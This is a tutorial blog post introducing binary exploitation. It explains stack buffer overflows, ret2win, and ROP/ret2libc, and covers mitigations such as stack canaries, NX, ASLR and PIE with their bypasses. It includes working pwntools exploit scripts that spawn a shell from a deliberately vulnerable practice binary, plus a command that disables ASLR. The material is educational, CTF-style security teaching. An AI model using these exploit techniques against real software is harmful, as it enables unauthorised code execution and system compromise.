Introduction to Binary Exploitation- Exploiting buffer overflows

This blog is the first in a series dedicated to binary exploitation in which we delve into the nuances of buffer overflow attacks.

Binary Exploitation pwning ctfs buffer overflow ROP

Bhavarth Karmarkar

February 15th 2024.

Introduction to Binary Exploitation- Exploiting buffer overflows

Binary Exploitation - Part 1

Hello amazing hackers, I am Bhavarth Karmarkar, a security engineer intern at BugBase. Today we are going to be commencing a series on a really interesting area of hacking - Binary Exploitation, which is most commonly found in CTFs (where it is also sometimes called pwn), but what's more fun is that it is also used a lot in kernel exploitation, jailbreaks and RCE CVEs in popular libraries.

Binary exploitation is a fairly advanced topic that involves finding and exploiting vulnerabilities in binary code. By the successful exploitation of these vulnerabilities, an attacker can gain foothold on the system, escalate privileges, bypass protections etc.

Even if the binary formats vary across some platforms and architectures for example ELF format for linux and PE32/PE32+ for Windows, the process of hacking a binary is fairly similar in all the cases.

In this part of the blog series, I am going to talk about some of the exploitation techniques of buffer overflow vulnerability, some of it's mitigations and their bypasses.

Contents of this Blog

Understanding a Binary
Memory Layout of a Process
Buffer Overflow
Exploiting Buffer Overflow
Mitigations Against Buffer Overflow

Understanding a Binary

So, what is a binary anyways?

A binary file (abbreviated to just binary) is a file containing a set of instructions from a specific intstruction set. An instruction set is the language of the Processor. It is how we can tell the Processor to execute a certain task. For example, The following is how an instruction looks like from the instruction set amd64.

1mov    DWORD PTR [rbp-0x24],eax
2

The mnemonic is basically how we specify the instruction to the processor. In this case, it is a MOV instruction which, as the name suggests, is used to move things around between memory and registers. This is one of the many-many instructions present in the AMD64 instruction set. A binary file is a collection of opcodes of such instructions which are generated by a compiler from a higher level language like C/C++/Python. An opcode is nothing but the sequence of bytes representing a specific instruction for example, a MOV instruction is encoded with the bytes 48 89 when moving from one register to another, or b8 when moving constant value into a register, these just represent the intstruction, the parameters for that instruction also need to be encoded and specified in the opcode according to the syntax.

Here is a whole function written in C and compiled into binary file as seen in gdb

1#include <stdio.h>
2
3int main() {
4		char buff[64];
5        puts("Enter Some Content: ");
6        gets(buff);
7}
8

And here is how the opcodes look like as a sequence of bytes, along with their corresponding assembly instructions.

objdump_main

The first part of a function is called the function epilogue and is used to set up the Stack. The necessity for this is rooted in the memory layout of a process.

Memory Layout of a Process

memory_layout

Stack

A stack is a Last In First Out data structure which grows in the memory from top down.

The stack is a scratchpad of a process where it stores local variables of a function and an important pointer that points to the return address where the process needs to jump back to after the current function is executed. The fact that this address is stored in the stack leads to a major vulnerability called Buffer Overflow.

Heap

The heap is another area of memory in a computer's process, distinct from the stack. While the stack is used for managing the execution flow and storing local variables in a structured manner, the heap is used for dynamic memory allocation. It is used to request memory in the run time which we won't be knowing ahead of time.

Data

The Data section (.data and .bss) is used to store the global variables of a program.

Text

This section stores the code and is usually the only section of the binary which has executable bit set, i.e. the data stored in this section can be executed as code.

Buffer Overflow

Buffer Overflow is a technique that is used to overwrite the data that is present before a buffer or a storage space which is reserved and filled in later. If the content with which the buffer gets filled is larger than the buffer, it leads to the excess content being spilled out of the buffer and into the adjacent memory locations.

As discussed earlier, the stack of a function stores the return pointer. When an attacker overflows a buffer, his ultimate aim is the control of Instruction Pointer Register or the Program Counter Register, which stores the address of the instruction to be executed next. If the attacker is successful in controlling this pointer, he/she can then based on the nature of the vulnerability, run unintended pieces of code.

Exploiting Buffer Overflow

In this section, I will be showing some popular techniques of exploiting a buffer overflow vulnerability found in a binary file

Ret2Shellcode/Ret2Win

A shellcode is a set of instructions that allows an attacker to make the process to execute any code he wills. This code can be anything ranging from executing a program, writing to a file, or spawning a full-blown shell that will connect back to the attacker.

Premise

The binary must have the NX bit unset, which makes the stack space Non Executable i.e we will get a SIGSEGV fault if the Program Counter/Instruction Pointer is pointing to a stack address.
The system must have the ASLR (Address Space Layout Randomization) mitigation turned off or there must exist some other way to achieve a leak of the stack addresses. (I In the case of a shellcode) Since the attacker has to reliably place the starting address of the shellcode at the location where the return pointer to the previous function was stored on the stack previously.
In the case of a win function, the PIE(Position independent Executable) mitigation must be turned off.

Attack Scenario/Example

Suppose that a vulnerable binary contains a function why that takes unrestricted user input and stores it in a buffer, also there is a win function:

1#include <stdio.h>
2
3void win() {
4	printf("Congratulations, here is your flag: [REDACTED]");
5
6}
7
8void vuln() {
9	char buff[64];
10	printf("Enter your payload: ");
11	gets(buff);
12}
13
14
15int main() {
16
17    //disable buffering of input
18    setvbuf(stdin, NULL, _IONBF, 0);
19    setvbuf(stdout, NULL, _IONBF, 0);
20    
21	vuln();
22}
23
24

Compile the code using the command : gcc -fno-stack-protector -no-pie vuln.c -o vuln

We will calculate the offset to the return pointer stored on the stack. To do this, I will set a breakpoint just before the gets() call.

break_gets

Now Let's examine the stack.

examine_stack

Now we will try to fill the buffer with 'A's (0x41).

Examining the stack again, we can determine the start of the buffer:

buffer_start

We can then calculate the offset between the return address location and the start of our buffer. Which turns out to be...

gef➤  p/d 0x7fffffffdd28-0x7fffffffdce0
$2 = 72

So we need to send in 72 'A's , and then the address of the win function, or the shellcode. But a shellcode is generally stored on the stack itself, and the stack addresses are unpredictable under ASLR, so you need to have some way to reliably predict or leak a location on the stack, to which you can later jump to in order to execute the shellcode successfully.

Since the binary is compiled using the -no-pie compiler option, we can easily find out the address of main by running objdump -t ./vuln command.

objdump_out

We can write a simple python script using pwntools.

1from pwn import *
2exe = ELF("./vuln")
3io = process("./vuln")
4
5io.sendlineafter(b"Enter your payload: ",b'A'*72+p64(exe.sym.win))
6io.interactive()
7

And that's it! It will overwrite the return pointer with the address of win function and after ending the

win

Sometimes the attacker uses a nop sled when they can't reliably predict the exact location for the start of the shellcode in a region of memory. They use the NOP opcode which is 0x90, which instructs the CPU to waste a cycle and move to the next instruction, thus creating a sliding sled-like movement that ultimately ends up in the shellcode. This looks like the following:

nop_sled

ROP

ROP, or Return oriented programming is a technique that relies on some instruction gadgets that reside in the binary itself, like

pop rbp
pop rdi
ret

The ret instruction after a set of instructions allows us to form a chain of such gadgets since a ret instruction pops the next address from the stack into the Instruction Pointer register.

Suppose that we have a binary that is vulnerable to a buffer overflow, but has the NX bit set and PIE disabled. This is a perfect condition to use a ROP attack. Let us understand this with an example:

We will be using the same code as above, however, this time there is no win function, also there is NX bit set, which will make the stack non-executable. In this case, we need to first make sure what the protections enabled on the binary are, we will use checksec to find it out.

checksec_out

Now we need to find out the ROP gadgets which will help us in our exploit. The most common ROP gadget is:

pop rdi
ret

The reason is that the rdi register contains the first argument for a function in the x64 calling convention. We can use the tool ROPgadget to find out all the gadgets available in a binary.

ROPgadget_out

Since we have the pop rdi;ret gadget, we can call some functions from the plt and pass an argument using the stack. This can allow us to leak the libc addresses and eventually call the system function.For developing the payload for the exploit, we need to understand what PLT and GOT table are in a binary. PLT or the Procedure Linkage Table is sort of a springboard, which relies on the GOT or the Global Offset Table to make jump to the actual dynamically linked function. For example, suppose that a binary uses the function puts of the C standard libarary. Due to the nature of linker, the actual function's address in the libc is not resolved until it is actually needed. So the compiler simply uses the PLT as a place holder, which is called and the PLT contains instruction to later jump to the address of the resolved function address that is stored in the GOT table.

got_plt

What this means is, that calling the plt entry of a function is effectively equivalent to calling the function. And if the Binary is not a Position Independent Executable, then the address of the plt entries for standard library function is known beforehand, working with pwntools makes this even easier.

Now since the GOT table consists of the actual addresses of the resolved stdlib functions, it can be used to leak libc addresses.

rop_chain = 'A'*72 # to fill the stack
rop_chain += pop_rdi_gadget # this will overwrite the return pointer
rop_chain += puts_got_address # this value will get popped into rdi
rop_chain += put_plt # equivalent to calling puts(puts_got_address)
rop_chain += main # call the main function again

These steps help us to leak the libc address by calling puts with the GOT table address of puts, which contains the address of the stdlib puts function in the memory. We then call main again for making use of the just leaked libc address.

Next step of the process is to call the system function with the argument "/bin/bash". Interstingly, the "/bin/bash" string is also stored somewhere in the libc code, and we will use the pwntools library to get that address, once we have defined the base address of libc. Here is the full code for the exploit:

1from pwn import * 
2
3libc = ELF("./libc.so.6")
4exe = ELF("./vuln")
5io = process("./vuln")
6
7main = p64(exe.sym.main)
8
9puts_got = p64(exe.got.puts)
10puts_plt=  p64(exe.plt.puts)
11pop_rdi = p64(0x4012a3)
12ret = p64(0x40101a)
13print(f"main: {hex(exe.sym.main)}")
14print(f"puts_got: {hex(exe.got.puts)}")
15print(f"puts_plt: {hex(exe.plt.puts)}")
16
17io.sendlineafter(b"Enter your payload: ",b'A'*72 + pop_rdi + puts_got + puts_plt + main )
18
19leak = u64(io.recvline().strip(b'\n').ljust(8,b"\x00"))
20print(f"leaked {hex(leak)}")
21print(f"symbol for puts is {hex(libc.symbols['puts'])}")
22libc.address = leak - libc.sym.puts
23print(f"libc base is at {hex(libc.address)}")
24
25
26system  = p64(libc.symbols['system'])
27sh_string = next(libc.search(b"/bin/sh"))
28print(f"System is at {hex(libc.symbols['system'])}")
29print(f"/bin/sh is at {hex(sh_string)}")
30sh_string = p64(sh_string)
31
32io.sendlineafter(b"Enter your payload: ",b'A'*72+ret+pop_rdi+sh_string+system) # a ret is added to address the movaps issue 
33
34io.interactive()
35

This trick is popularly known as Ret2Libc.

[ NOTE: Sometimes you will need to add a few rets in the payload to deal with the ubuntu:20.04 MOVAPS issue ]

Mitigations Against Buffer Overflow

1. Stack Canary:

A stack Canary is a random 8-byte value starting with a null byte which is placed at the beginning of a stack just after the address where the return pointer for the function is stored. It is the most common mitigation against buffer overflow attacks. The null byte placed at the start of a stack canary is used to prevent accidentally leaking the canary while printing a string stored on the stack.

There are many ways to bypass the Stack Canary:

The most common way to bypass a stack canary is to either overwrite just this one null byte with a buffer that is later at some point printed and then overflow the buffer again and restore the canary along with overwriting past it.
Another technique is when you have Out of Bounds Write, for example by the means of incorrect indexing of the array. This can sometimes allow us to 'fly-over' the canary such that we don't modify it.
One more method for leaking the canary is through the format strings, which help us leak data from the stack.

2. Data Execution Prevention/ Non-Executable Bit

This is a protection mechanism which sets the stack region of the process as non-executable. Which means that the process will SEGFAULT if the Instruction Pointer points to a location in the stack and the Processor tries to execute an instruction on the stack.

Bypassing this one requires some ROP-fu, where we call the syscall mprotect() , which can set the executable bit on the memory space of the stack and allow us to execute our shellcode without any issues.

3. Address Space Layout Randomisation

This is a kernel protection mechanism that randomizes the base address of the stack and the LIBC etc., the beforehand knowledge of which greatly eases the exploit development process. Almost every time an attacker will need to leak the stack and libc address due to this mitigation in place. You can experiment how the address on which the libc is loaded differs each time by running the ldd command against any binary.

ldd_aslr_on

You can disable it on your system by running

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

After disabling the aslr, try running ldd again several times and see how the base address of libc is always fixed.

ldd_aslr_off

... to enable it again, run

echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

To bypass ASLR, the only thing we can do is leak some libc addresses using for example the above trick ret2libc, or format string or a number of different heap exploitation techniques which will be covered in the upcoming part of this series.

4. Position Independent Executable

A Position Independent Executable causes the binary to be loaded at different base address and all the other symbols in the binary are referenced offset to this base. Below, you can see the difference in the symbol table of a binary compiled normally and another with -no-pie compiler option.

pie_objdump With PIE

![no_pie_objdump]https://bugbase.s3.ap-south-1.amazonaws.com/bugbase-blogs/binexp1/no_pie_objdump.png() Without PIE

As with ASLR, you need to leak some addresses, which in this case would be the address in the range of which the binary gets loaded. As seen in the below image.

info_file

Conclusion

In this blog, we learned about some of the techniques for exploiting buffer overflow like ret2win/ret2shellcode, ret2libc, and some common mitigations like Stack Canaries, NX bit, PIE, and ASLR, and their possible bypasses. This blog was a pilot to a series on binary exploitation which will be going into topics such as Windows binary exploitation, heap exploitation, kernel exploitation, and exploiting some complex binaries. If such topics thrill you, stay tuned for the next blog ;)